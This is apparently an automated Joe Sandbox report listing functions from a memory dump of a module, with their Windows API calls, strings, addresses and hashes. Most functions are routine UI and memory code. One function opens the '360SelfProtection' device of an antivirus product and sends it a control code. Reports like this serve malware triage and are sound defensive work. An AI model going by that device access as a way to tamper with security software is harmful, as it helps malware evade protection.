Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: H_prolog3$lstrlen
String ID: %d,%d,%d,%d$0,0,0,0$0x%x$anchor$bound$control_style$margin$shortcut$style$tab_id$tip
API String ID: 1485999228-2291584412
Opcode ID: 5487e59d579a20ab8490d75546d12333ca4a9a440a320018d2649d550e8224bc
Instruction ID: ed4c2345df526c186bec593ac15a5164edea8c0097c6b49060f5f5043aa2c62d
Opcode Fuzzy Hash: 5487e59d579a20ab8490d75546d12333ca4a9a440a320018d2649d550e8224bc
Instruction Fuzzy Hash: E8916EB1914349FBCF05ABE9CD41AEEBFB9AB99214F11444CF045B3741CB356A048BAA

Function 6C668C75 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 321COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C668C7C

Part of subcall function 6C65A00F: __EH_prolog3_catch.LIBCMT ref: 6C65A016

Part of subcall function 6C6599EF: __EH_prolog3.LIBCMT ref: 6C6599F6

Part of subcall function 6C5DC2CF: lstrlenW.KERNEL32(00000010,THEME.UI,?,00000000,6C5F0BA5,?,00000008,6C5FDEF0,?,00000010,?), ref: 6C5DC2F9

Part of subcall function 6C667EFC: __EH_prolog3.LIBCMT ref: 6C667F03

Part of subcall function 6C6598E1: __EH_prolog3.LIBCMT ref: 6C6598E8

Part of subcall function 6C5D894F: InterlockedDecrement.KERNEL32(-000000F4), ref: 6C5D8963

Part of subcall function 6C668612: __EH_prolog3_GS.LIBCMT ref: 6C668619

Strings

normal, xrefs: 6C668D1C, 6C668DD0
fonts/, xrefs: 6C668F18
width, xrefs: 6C668DEA
canvas, xrefs: 6C668C96, 6C668C9B, 6C668CC3
font, xrefs: 6C668E18, 6C668E1D, 6C668E44
ref, xrefs: 6C668EA1
border, xrefs: 6C668D43, 6C668D48, 6C668D75

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: H_prolog3$DecrementH_prolog3_H_prolog3_catchInterlockedlstrlen
String ID: border$canvas$font$fonts/$normal$ref$width
API String ID: 479624069-4029285125
Opcode ID: 1451eff23fdba4102500645468bb59fc07dd0916c5351210e6ccc6324751cd88
Instruction ID: f54785367da91ff628ac45632fe8231bc39d689ffb71ba200e4e7c404d464aea
Opcode Fuzzy Hash: 1451eff23fdba4102500645468bb59fc07dd0916c5351210e6ccc6324751cd88
Instruction Fuzzy Hash: EFC19470901249EFDF04DBE8C950AEEBBB5AF5A308F604049E415A7B91DB346F09C76A

Function 6C638C78 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(6C5E3FDF,6C702818,6C702408), ref: 6C638C97
GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 6C638CAA
GetModuleHandleW.KERNEL32(Kernel32.dll,AddDllDirectory), ref: 6C638CD8
GetProcAddress.KERNEL32(00000000), ref: 6C638CDB
LoadLibraryExW.KERNEL32(6C5E3FDF,00000000,00000000), ref: 6C638CFE

Strings

AddDllDirectory, xrefs: 6C638CCE
Kernel32.dll, xrefs: 6C638CD3

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Module$Handle$AddressFileLibraryLoadNameProc
String ID: AddDllDirectory$Kernel32.dll
API String ID: 2449539070-4108935418
Opcode ID: 3dae4ab8a5217780039992692ec2e199bc3bf63b71ddb3b9e8f1fa8c4dceebeb
Instruction ID: 6262c517ec424c4b4902ab773dffe16a931ccb6b283c2174d8c65521d3383b12
Opcode Fuzzy Hash: 3dae4ab8a5217780039992692ec2e199bc3bf63b71ddb3b9e8f1fa8c4dceebeb
Instruction Fuzzy Hash: 9A1148703066296ADF019B32CD88FEA7BBCAB8B708F10653BE405E3480DB3494448B6C

Function 6C630C05 Relevance: 12.1, APIs: 8, Instructions: 125windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C630C0C
IsRectEmpty.USER32(?), ref: 6C630C75
InvalidateRect.USER32(?,?,00000001,?,00000020,?,00000000,00000000), ref: 6C630C97

Part of subcall function 6C5EC3D5: GetDC.USER32(?), ref: 6C5EC3E3

Part of subcall function 6C5EEC18: CreateCompatibleDC.GDI32(?), ref: 6C5EEC3C
Part of subcall function 6C5EEC18: SelectObject.GDI32(?,?), ref: 6C5EEC63
Part of subcall function 6C5EEC18: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 6C5EEC7C

Part of subcall function 6C5EDBF6: CreateRectRgn.GDI32(?,?,?,?), ref: 6C5EDC09

SelectClipRgn.GDI32(?,?), ref: 6C630CEA
OffsetClipRgn.GDI32(?,?,?,?,00000020,?,00000000,00000000), ref: 6C630CF9
SendMessageW.USER32(?,000007E8,?,?), ref: 6C630D1B
SelectClipRgn.GDI32(?,00000000), ref: 6C630D4A
DeleteObject.GDI32(?), ref: 6C630D5E

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: ClipRectSelect$CreateObject$CompatibleDeleteEmptyH_prolog3InvalidateMessageOffsetSendViewport
String ID:
API String ID: 3329816297-0
Opcode ID: e0e228a8e03b3f5f7e307bc97526830a8385b12c7c1ab4450967d9a3b879c466
Instruction ID: 9d9c25de872c5f7db734eb03c769635e9df06eae9815a6b48ce905390aa9ad4f
Opcode Fuzzy Hash: e0e228a8e03b3f5f7e307bc97526830a8385b12c7c1ab4450967d9a3b879c466
Instruction Fuzzy Hash: 5F512771A00259EFDF01DFA5CC80EEEBBB9FF49314F106419E51AA7250DB30A949CB68

Function 6C5FCC1F Relevance: 7.6, APIs: 5, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C5FCC26
EnterCriticalSection.KERNEL32(?,00000078,6C5FCEC8,?,?,?,00000001), ref: 6C5FCC66
LeaveCriticalSection.KERNEL32(?,00000000,?), ref: 6C5FCC87
VariantInit.OLEAUT32(?), ref: 6C5FCCE0
VariantClear.OLEAUT32(?), ref: 6C5FCD25

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: CriticalSectionVariant$ClearEnterH_prolog3InitLeave
String ID:
API String ID: 1050041418-0
Opcode ID: cf46d38040bbc011289b43e3260c6531582595ccf6b36986e64c1d54ba246a28
Instruction ID: b81248daa21ece5496a5d3a644c76b52cb75f5cebeb204152df85a0def2d7c05
Opcode Fuzzy Hash: cf46d38040bbc011289b43e3260c6531582595ccf6b36986e64c1d54ba246a28
Instruction Fuzzy Hash: 8E41497190120AEFDF05DFA4CD84AEEBBB8FF45308F204429E515A6690EB71AE45CF64

Function 6C5D6CD0 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(18AE8C58), ref: 6C5D6CFA
HeapLock.KERNEL32(00000000), ref: 6C5D6D20
HeapWalk.KERNEL32(00000000,?), ref: 6C5D6D3A
HeapWalk.KERNEL32(00000000,?), ref: 6C5D6D6E
HeapUnlock.KERNEL32(00000000), ref: 6C5D6D82

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Heap$Walk$LockProcessUnlock
String ID:
API String ID: 2227978497-0
Opcode ID: 5fd4feeb844740649d99b0663f7c2cf0bddf443503f0b59c96e858b5ba7a0fc0
Instruction ID: 28fe9a92e2c12f1688025786748e2e98a732c261ea59c39e9d1e4b0e63cff332
Opcode Fuzzy Hash: 5fd4feeb844740649d99b0663f7c2cf0bddf443503f0b59c96e858b5ba7a0fc0
Instruction Fuzzy Hash: EE2125322097419FC700DF2AD840A9AB7F4EF85664F510A2EF851C3640DB30A502CBAA

Function 6C678CFE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C678D05
std::runtime_error::runtime_error.LIBCPMT ref: 6C678D2D

Part of subcall function 6C5DCA0D: __EH_prolog3.LIBCMT ref: 6C5DCA14

__CxxThrowException@8.LIBCMT ref: 6C678D42

Part of subcall function 6C68D5D6: RaiseException.KERNEL32(?,?,6C68DF98,?,?,?,?,?,6C68DF98,?,6C6C908C,6C7035A4), ref: 6C68D618

Strings

map/set<T> too long, xrefs: 6C678D15

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: H_prolog3$ExceptionException@8RaiseThrowstd::runtime_error::runtime_error
String ID: map/set<T> too long
API String ID: 1048600877-1285458680
Opcode ID: 6782d05fd0d7a0c277dbdadf5574ddb51b7b385d8be21fa9502f08c25d5a8ab7
Instruction ID: 5a0daafd41c8d06781f9024494eec5fe0b272f47f3d5d6801b920c160ae92967
Opcode Fuzzy Hash: 6782d05fd0d7a0c277dbdadf5574ddb51b7b385d8be21fa9502f08c25d5a8ab7
Instruction Fuzzy Hash: 2E515771600640DFD725DF09C584A99BBF1BF19318F09898AD444ABBA2C770FC86CFA8

Function 6C676C7C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C676C83
CharLowerW.USER32(00000001,00000001,0000001C,6C675DDA,6C6B63E0,00000001,00000000,?,00000000,00000000,00000000,00000001), ref: 6C676CC0

Part of subcall function 6C5D894F: InterlockedDecrement.KERNEL32(-000000F4), ref: 6C5D8963

Strings

DPI_%d_%s\%s, xrefs: 6C676D20
DPI_%d_%s, xrefs: 6C676CFD

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: CharDecrementH_prolog3InterlockedLower
String ID: DPI_%d_%s$DPI_%d_%s\%s
API String ID: 3802631866-1944168103
Opcode ID: 02f997a5a1bfca8bdb3dada5d6e7105a1e5f29b86e01cc755047ccc27b9879ee
Instruction ID: 5131f70f2a64900be61ceba1c2a802001fd9f40c43d808a6a77844d35cbd22df
Opcode Fuzzy Hash: 02f997a5a1bfca8bdb3dada5d6e7105a1e5f29b86e01cc755047ccc27b9879ee
Instruction Fuzzy Hash: F941717591120ADFCF10DFA4CD91AEEB7B0BF19318F104915D515A7BA0EB30AA18CBA9

Function 6C638C00 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(\\.\360SelfProtection,00000080,00000003,00000000,00000003,00000000,00000000,6C5E3FDF,771B0E50,?,?,?,6C638C75,00000000), ref: 6C638C1D
DeviceIoControl.KERNEL32(00000000,0022204C,6C638C75,00000004,00000000,00000004,6C638C75,00000000), ref: 6C638C4C
CloseHandle.KERNEL32(00000000,?,?,?,?,6C638C75,00000000), ref: 6C638C55

Strings

\\.\360SelfProtection, xrefs: 6C638C15

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: \\.\360SelfProtection
API String ID: 33631002-936859468
Opcode ID: 081bb413ed4db25762ba6f802f5758c5617ee0b2dc56c86ddcc9b8c228c2f0c8
Instruction ID: 3aba469194d6066c7e2c7de56639718d3addfcd7e0b22aab598f3b811f73584c
Opcode Fuzzy Hash: 081bb413ed4db25762ba6f802f5758c5617ee0b2dc56c86ddcc9b8c228c2f0c8
Instruction Fuzzy Hash: 8AF0A471602228BFDB109AA6DC89EEF7A7CDB86B60F105112F604E60D0D2B49F00C7A8

Function 6C606CE5 Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

ColorRGBToHLS.SHLWAPI(?,?,?,?), ref: 6C606D16
ColorHLSToRGB.SHLWAPI(?,?,?), ref: 6C606DC9
ColorHLSToRGB.SHLWAPI(?,?,?), ref: 6C606DD9
ColorHLSToRGB.SHLWAPI(?,?,?), ref: 6C606DEA

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Color
String ID:
API String ID: 2811717613-0
Opcode ID: 2f289b8c9114ad83617d5d2cb15604833d42571d09ac3a5f24c3da21eaa11cb5
Instruction ID: 0326b1db2e3eeda621d116718799af274071fe10f24376e1710b0d2ae15fba4d
Opcode Fuzzy Hash: 2f289b8c9114ad83617d5d2cb15604833d42571d09ac3a5f24c3da21eaa11cb5
Instruction Fuzzy Hash: 3831B071E0022EAACF065FA5CA452EE7FB4EF06381F104645F941B12A0E77586A1DBE8

Function 6C67CC06 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 6C679AD9: GdipAlloc.GDIPLUS(00000008), ref: 6C679AED
Part of subcall function 6C679AD9: SetBkMode.GDI32(00000000,00000001), ref: 6C679B0D
Part of subcall function 6C679AD9: CreateFontIndirectW.GDI32(?), ref: 6C679B19

GdipDeletePath.GDIPLUS(?), ref: 6C67CC43
GdipFree.GDIPLUS(?,?), ref: 6C67CC49
GdipDeletePath.GDIPLUS(?), ref: 6C67CCCA
GdipFree.GDIPLUS(?,?), ref: 6C67CCD0

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Gdip$DeleteFreePath$AllocCreateFontIndirectMode
String ID:
API String ID: 1213607936-0
Opcode ID: 0dfefc93b5a52fdbb287b24ffaf05ba621c1c0e2b400ea71ba9ec228c29ce58e
Instruction ID: 033f7f87bfa053554b2af09dda8b7670c51b23383466b199072c15bd2b341149
Opcode Fuzzy Hash: 0dfefc93b5a52fdbb287b24ffaf05ba621c1c0e2b400ea71ba9ec228c29ce58e
Instruction Fuzzy Hash: A6218B71501109FFDF109F64DD449EA3BB8EF4A358B214884FD5567210D332DA25DBB8

Function 6C67EC36 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C6799A5: GdipAlloc.GDIPLUS(00000008), ref: 6C6799B9
Part of subcall function 6C6799A5: SetBkMode.GDI32(00000000,00000001), ref: 6C6799D9
Part of subcall function 6C6799A5: CreateFontIndirectW.GDI32(?), ref: 6C6799E5

GdipDeletePath.GDIPLUS(00000000), ref: 6C67EC73
GdipFree.GDIPLUS(00000000,00000000), ref: 6C67EC79
GdipDeletePath.GDIPLUS(00000000), ref: 6C67ECB5
GdipFree.GDIPLUS(00000000,00000000), ref: 6C67ECBB

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Gdip$DeleteFreePath$AllocCreateFontIndirectMode
String ID:
API String ID: 1213607936-0
Opcode ID: e05b19c3880d860e9683435e4b8a358434e883640e8787dd298266084dabc22e
Instruction ID: f61bb6b05c894f48469633ff0ccaf9d9df6cb5ced0daea9c3d846a974f7aa818
Opcode Fuzzy Hash: e05b19c3880d860e9683435e4b8a358434e883640e8787dd298266084dabc22e
Instruction Fuzzy Hash: 29113675601109FFDF058F94CE459DE3BA9EF0A388B004594F914A7320D7329A25EBB8

Function 6C640CE0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C640CE7

Part of subcall function 6C640A41: __EH_prolog3.LIBCMT ref: 6C640A48

LoadCursorW.USER32 ref: 6C640DAD
LoadCursorW.USER32(00000000,00007F84), ref: 6C640DB6
LoadCursorW.USER32(00000000,00007F85), ref: 6C640DBF

Part of subcall function 6C63CF81: DestroyCursor.USER32(?), ref: 6C63CF96
Part of subcall function 6C63CF81: DestroyCursor.USER32(?), ref: 6C63CFA3
Part of subcall function 6C63CF81: DestroyCursor.USER32(?), ref: 6C63CFB0

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
